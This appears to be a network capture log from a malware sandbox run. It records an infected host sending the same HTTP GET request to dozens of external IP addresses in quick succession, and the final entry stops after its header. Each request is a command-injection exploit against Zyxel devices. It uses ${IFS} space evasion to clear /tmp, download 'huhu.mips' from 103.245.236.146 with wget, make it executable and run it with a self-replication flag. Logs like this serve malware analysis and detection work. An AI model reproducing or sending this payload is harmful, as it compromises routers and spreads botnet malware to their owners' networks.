                                              Jan 29, 2024 07:03:54.091022968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5319192.168.2.1454188202.99.54.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091053963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5320192.168.2.1435554222.192.13.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091098070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5321192.168.2.1448242155.53.68.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091147900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5322192.168.2.1449904109.212.173.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091182947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5323192.168.2.1444788101.201.30.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091207981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5324192.168.2.1442818174.195.168.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091239929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5325192.168.2.144217490.45.116.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091280937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5326192.168.2.1460478184.34.3.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091327906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5327192.168.2.1453838206.36.98.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091341972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5328192.168.2.145206620.244.195.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091392994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5329192.168.2.1457798154.90.211.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091437101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5330192.168.2.14520284.107.70.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091480017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5331192.168.2.144579046.189.197.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091541052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5332192.168.2.145331257.183.187.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091566086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5333192.168.2.1454428203.155.220.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091622114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5334192.168.2.145436435.192.6.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091649055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5335192.168.2.145187658.35.210.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091679096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5336192.168.2.1452844125.33.66.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091711044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5337192.168.2.1446316122.165.67.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091744900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5338192.168.2.1441274212.239.93.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091787100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5339192.168.2.1452542174.207.71.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091829062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5340192.168.2.145608083.4.56.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091861963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5341192.168.2.143519039.42.137.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091898918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5342192.168.2.1440668191.240.214.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091937065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5343192.168.2.1436276193.50.225.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091958046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5344192.168.2.145714871.20.241.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.091994047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5345192.168.2.1433496143.252.151.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092056036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5346192.168.2.143291444.4.136.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092092991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5347192.168.2.1444390216.186.198.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092113018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5348192.168.2.14574205.146.32.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092164993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5349192.168.2.144939281.222.184.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092201948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5350192.168.2.1440694196.126.150.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092255116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5351192.168.2.1444358169.59.188.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092297077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5352192.168.2.145345080.21.95.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092327118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5353192.168.2.14450945.242.149.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092350006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5354192.168.2.1457110138.126.168.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092401981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5355192.168.2.1441496148.203.39.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092422009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5356192.168.2.1434662115.48.215.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092461109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5357192.168.2.143978613.189.98.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092499971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5358192.168.2.14424908.168.97.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092539072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5359192.168.2.146003831.158.60.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092559099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5360192.168.2.143849660.94.170.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092592955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5361192.168.2.143922074.133.40.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092655897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5362192.168.2.1432802107.157.71.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092710972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5363192.168.2.1456958182.181.61.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092744112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5364192.168.2.1445154142.78.215.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092787027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5365192.168.2.144912237.184.211.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092808962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5366192.168.2.144252662.157.164.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092860937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5367192.168.2.1444216142.102.170.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092892885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5368192.168.2.1457366143.116.206.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092926979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5369192.168.2.145945452.219.78.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.092995882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5370192.168.2.145265445.28.150.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093034983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5371192.168.2.1444152145.242.69.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093074083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5372192.168.2.144168086.191.236.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093102932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5373192.168.2.1458212180.125.227.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093158960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5374192.168.2.144903854.164.178.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093194008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5375192.168.2.144174479.227.241.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093233109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5376192.168.2.1443168155.36.114.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093281984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5377192.168.2.145454644.140.213.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093343973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5378192.168.2.144517099.50.5.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093374014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5379192.168.2.143715870.195.169.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093417883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5380192.168.2.14536985.175.95.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093444109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5381192.168.2.143446279.246.149.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093480110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5382192.168.2.145051277.176.15.43443
                                              TimestampBytes transferredDirectionData
